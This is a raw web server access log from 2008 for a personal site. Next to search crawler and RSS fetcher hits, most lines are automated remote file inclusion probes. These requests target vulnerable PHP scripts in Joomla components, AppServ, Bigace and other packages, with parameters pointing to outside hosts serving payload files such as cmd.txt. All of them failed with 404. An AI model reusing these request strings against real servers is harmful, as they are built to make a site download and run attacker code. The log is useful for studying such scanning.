67.195.37.90 - - [26/May/2008:06:27:55 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
67.195.37.90 - - [26/May/2008:06:27:58 -0700] "GET / HTTP/1.0" 200 896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
64.1.215.164 - - [26/May/2008:06:29:39 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "notahamsandwich.com"
72.14.199.31 - - [26/May/2008:07:12:16 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
216.167.156.20 - - [26/May/2008:07:27:05 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
216.167.156.20 - - [26/May/2008:07:27:05 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
216.167.156.20 - - [26/May/2008:07:27:05 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
74.55.53.226 - - [26/May/2008:07:56:57 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
74.55.53.226 - - [26/May/2008:07:56:58 -0700] "GET //appserv/main.php?appserv_root=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
74.55.53.226 - - [26/May/2008:07:56:58 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
74.220.202.38 - - [26/May/2008:08:05:59 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
74.220.202.38 - - [26/May/2008:08:05:59 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
74.55.53.226 - - [26/May/2008:08:10:04 -0700] "GET //appserv/main.php?appserv_root=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
72.14.199.86 - - [26/May/2008:08:12:20 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
74.55.53.226 - - [26/May/2008:08:20:41 -0700] "GET /logs/access_080421.log//appserv/main.php?appserv_root=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
74.55.53.226 - - [26/May/2008:08:20:41 -0700] "GET //appserv/main.php?appserv_root=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
74.55.53.226 - - [26/May/2008:08:20:41 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
74.55.53.226 - - [26/May/2008:08:21:16 -0700] "GET /logs/access_080414.log//appserv/main.php?appserv_root=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
83.166.170.76 - - [26/May/2008:08:29:58 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.walmax.eu/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.notahamsandwich.com"
83.166.170.76 - - [26/May/2008:08:29:58 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.walmax.eu/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.notahamsandwich.com"
74.55.53.226 - - [26/May/2008:08:30:28 -0700] "GET /logs/access.log//bbs/include/bbs.lib.inc.php?site_path=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
74.55.53.226 - - [26/May/2008:08:30:28 -0700] "GET //bbs/include/bbs.lib.inc.php?site_path=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
74.55.53.226 - - [26/May/2008:08:30:29 -0700] "GET /logs//bbs/include/bbs.lib.inc.php?site_path=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
67.15.48.60 - - [26/May/2008:08:31:57 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
67.15.48.60 - - [26/May/2008:08:31:57 -0700] "GET /logs/access.log/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
67.15.48.60 - - [26/May/2008:08:31:57 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
67.15.48.60 - - [26/May/2008:08:31:57 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
67.15.48.60 - - [26/May/2008:08:31:57 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
67.15.48.60 - - [26/May/2008:08:31:59 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.notahamsandwich.com"
74.6.18.218 - - [26/May/2008:08:35:32 -0700] "GET / HTTP/1.0" 200 896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.notahamsandwich.com"
70.84.182.98 - - [26/May/2008:08:40:13 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.walmax.eu/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.notahamsandwich.com"
70.84.182.98 - - [26/May/2008:08:40:14 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.walmax.eu/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.notahamsandwich.com"
147.91.226.2 - - [26/May/2008:08:48:37 -0700] "GET /logs//bigace/addon/smarty/plugins/function.captcha.php?=http://www.gnetelearningsystem.com.ar/campus/imagenes/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
147.91.226.2 - - [26/May/2008:08:48:37 -0700] "GET //bigace/addon/smarty/plugins/function.captcha.php?=http://www.gnetelearningsystem.com.ar/campus/imagenes/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
74.6.21.236 - - [26/May/2008:08:52:45 -0700] "GET /?p=109 HTTP/1.0" 200 498 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "blog.notahamsandwich.com"
72.14.199.31 - - [26/May/2008:09:13:12 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
200.6.155.217 - - [26/May/2008:09:24:50 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
200.6.155.217 - - [26/May/2008:09:24:50 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.notahamsandwich.com"
72.14.199.31 - - [26/May/2008:10:13:12 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
202.179.0.195 - - [26/May/2008:10:14:17 -0700] "GET /logs/access.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.notahamsandwich.com"
202.179.0.195 - - [26/May/2008:10:14:17 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.notahamsandwich.com"
202.179.0.195 - - [26/May/2008:10:14:18 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.notahamsandwich.com"
202.179.0.195 - - [26/May/2008:10:15:15 -0700] "GET /logs/access.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.notahamsandwich.com"
202.179.0.195 - - [26/May/2008:10:15:16 -0700] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.notahamsandwich.com"
202.179.0.195 - - [26/May/2008:10:15:16 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.notahamsandwich.com"
190.54.49.157 - - [26/May/2008:10:21:45 -0700] "GET /logs/access_080421.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
190.54.49.157 - - [26/May/2008:10:21:45 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
190.54.49.157 - - [26/May/2008:10:21:45 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
201.236.111.227 - - [26/May/2008:10:26:08 -0700] "GET /logs//ashnews.php?pathtoashnews=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
201.236.111.227 - - [26/May/2008:10:26:14 -0700] "GET //ashnews.php?pathtoashnews=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
201.236.111.227 - - [26/May/2008:10:28:55 -0700] "GET //ashnews.php?pathtoashnews=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
190.54.49.157 - - [26/May/2008:10:35:42 -0700] "GET /logs/access_080414.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ilegais.xpg.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
83.98.156.151 - - [26/May/2008:10:41:32 -0700] "GET /samplephotogallery.php?path[docroot]=http://www.welkominfo.co.za/lapa/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.notahamsandwich.com"
83.98.156.151 - - [26/May/2008:10:41:35 -0700] "GET /logs/samplephotogallery.php?path[docroot]=http://www.welkominfo.co.za/lapa/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.notahamsandwich.com"
202.179.0.195 - - [26/May/2008:10:45:12 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=[phpbb_path]=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.notahamsandwich.com"
202.179.0.195 - - [26/May/2008:10:45:12 -0700] "GET //include/bbs.lib.inc.php?site_path=[phpbb_path]=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.notahamsandwich.com"
202.179.0.195 - - [26/May/2008:10:45:13 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=[phpbb_path]=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.notahamsandwich.com"
202.179.0.195 - - [26/May/2008:10:45:29 -0700] "GET /logs/access.log//include/bbs.lib.inc.php?site_path=[phpbb_path]=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.notahamsandwich.com"
202.179.0.195 - - [26/May/2008:10:45:30 -0700] "GET //include/bbs.lib.inc.php?site_path=[phpbb_path]=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.notahamsandwich.com"
202.179.0.195 - - [26/May/2008:10:45:30 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=[phpbb_path]=http://hist.hongik.ac.kr/zb4pl6/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.notahamsandwich.com"
201.236.111.227 - - [26/May/2008:10:48:25 -0700] "GET //ashnews.php?pathtoashnews=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
125.164.204.239 - - [26/May/2008:10:50:24 -0700] "GET /logs/access.log HTTP/1.1" 200 64096 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.notahamsandwich.com"
83.98.156.151 - - [26/May/2008:10:50:25 -0700] "GET /samplenewsletter.php?path[docroot]=http://www.welkominfo.co.za/lapa/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.notahamsandwich.com"
83.98.156.151 - - [26/May/2008:10:50:25 -0700] "GET /logs/samplenewsletter.php?path[docroot]=http://www.welkominfo.co.za/lapa/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.notahamsandwich.com"
211.51.62.221 - - [26/May/2008:10:59:12 -0700] "GET /logs//errors.php?error=http://eazyfonez.com.au/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
72.14.199.86 - - [26/May/2008:11:13:32 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
72.14.199.117 - - [26/May/2008:12:13:32 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
193.54.123.192 - - [26/May/2008:12:19:21 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.germ2.com/www/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
193.54.123.192 - - [26/May/2008:12:23:10 -0700] "GET /logs///appserv/main.php?appserv_root=http://www.germ2.com/www/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.notahamsandwich.com"
159.213.248.4 - - [26/May/2008:12:23:51 -0700] "GET /logs///appserv/main.php?appserv_root=http://www.germ2.com/www/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
159.213.248.4 - - [26/May/2008:12:38:39 -0700] "GET /logs///appserv/main.php?appserv_root=http://www.germ2.com/www/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
159.213.248.4 - - [26/May/2008:13:02:01 -0700] "GET /logs///appserv/main.php?appserv_root=http://www.germ2.com/www/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
72.14.199.38 - - [26/May/2008:13:14:06 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
213.194.149.170 - - [26/May/2008:13:53:35 -0700] "GET /logs/access_080414.log/wordtube-button.php?wpPATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
213.194.149.170 - - [26/May/2008:13:53:35 -0700] "GET /wordtube-button.php?wpPATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
213.194.149.170 - - [26/May/2008:13:53:35 -0700] "GET /logs/wordtube-button.php?wpPATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
213.194.149.170 - - [26/May/2008:13:54:56 -0700] "GET /logs/access.log/wordtube-button.php?wpPATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
72.14.199.117 - - [26/May/2008:14:14:06 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
72.14.199.117 - - [26/May/2008:15:14:24 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
72.3.133.251 - - [26/May/2008:15:47:23 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/kenthu/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.notahamsandwich.com"
72.3.133.251 - - [26/May/2008:15:47:23 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/kenthu/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.notahamsandwich.com"
85.214.72.189 - - [26/May/2008:15:49:20 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://batamload.bravehost.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.notahamsandwich.com"
85.214.72.189 - - [26/May/2008:15:49:20 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://batamload.bravehost.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.notahamsandwich.com"
147.91.226.2 - - [26/May/2008:15:51:47 -0700] "GET /logs//bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=http://www.gnetelearningsystem.com.ar/campus/imagenes/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
147.91.226.2 - - [26/May/2008:15:51:48 -0700] "GET //bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=http://www.gnetelearningsystem.com.ar/campus/imagenes/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
147.91.226.2 - - [26/May/2008:15:51:49 -0700] "GET /logs//bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://www.gnetelearningsystem.com.ar/campus/imagenes/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
147.91.226.2 - - [26/May/2008:15:51:50 -0700] "GET //bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://www.gnetelearningsystem.com.ar/campus/imagenes/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.notahamsandwich.com"
70.255.174.246 - - [26/May/2008:16:12:43 -0700] "GET /logs/ HTTP/1.0" 200 7220 "-" "Wget/1.5.3.1" "notahamsandwich.com"
72.14.199.31 - - [26/May/2008:16:14:24 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
217.217.140.19 - - [26/May/2008:16:20:46 -0700] "GET /logs//ImpExData.php?systempath=http://www.bogazlikoyu.com//components/com_zoom/images/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.notahamsandwich.com"
217.217.140.19 - - [26/May/2008:16:20:50 -0700] "GET //ImpExData.php?systempath=http://www.bogazlikoyu.com//components/com_zoom/images/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.notahamsandwich.com"
77.91.224.15 - - [26/May/2008:16:30:28 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.notahamsandwich.com"
77.91.224.15 - - [26/May/2008:16:30:28 -0700] "GET / HTTP/1.1" 200 912 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.notahamsandwich.com"
217.217.140.19 - - [26/May/2008:16:30:32 -0700] "GET /logs//themes/default/theme.php?THEME_DIR=http://www.bogazlikoyu.com//components/com_zoom/images/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.notahamsandwich.com"
217.217.140.19 - - [26/May/2008:16:30:39 -0700] "GET //themes/default/theme.php?THEME_DIR=http://www.bogazlikoyu.com//components/com_zoom/images/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.notahamsandwich.com"
80.67.23.140 - - [26/May/2008:16:30:46 -0700] "GET //skin/zero_vote/error.php?dir=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
80.67.23.140 - - [26/May/2008:16:30:47 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
80.67.23.140 - - [26/May/2008:16:32:47 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.notahamsandwich.com"
195.238.232.20 - - [26/May/2008:16:33:59 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "-" "blog.notahamsandwich.com"
72.14.199.86 - - [26/May/2008:17:14:28 -0700] "GET /?feed=rss2 HTTP/1.1" 200 514 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 6 subscribers; feed-id=2879958457252815395)" "blog.notahamsandwich.com"
216.227.209.138 - - [26/May/2008:17:33:04 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/koeluna/response.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.notahamsandwich.com"
216.227.209.138 - - [26/May/2008:17:33:04 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/koeluna/response.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.notahamsandwich.com"
216.227.209.138 - - [26/May/2008:17:35:10 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
216.227.209.138 - - [26/May/2008:17:35:11 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/mahesaputra53/kiss.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.notahamsandwich.com"
72.34.226.62 - - [26/May/2008:17:39:03 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
72.34.226.62 - - [26/May/2008:17:39:04 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.notahamsandwich.com"
201.236.111.227 - - [26/May/2008:17:39:29 -0700] "GET /logs/access_080414.log//ashnews.php?pathtoashnews=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.notahamsandwich.com"
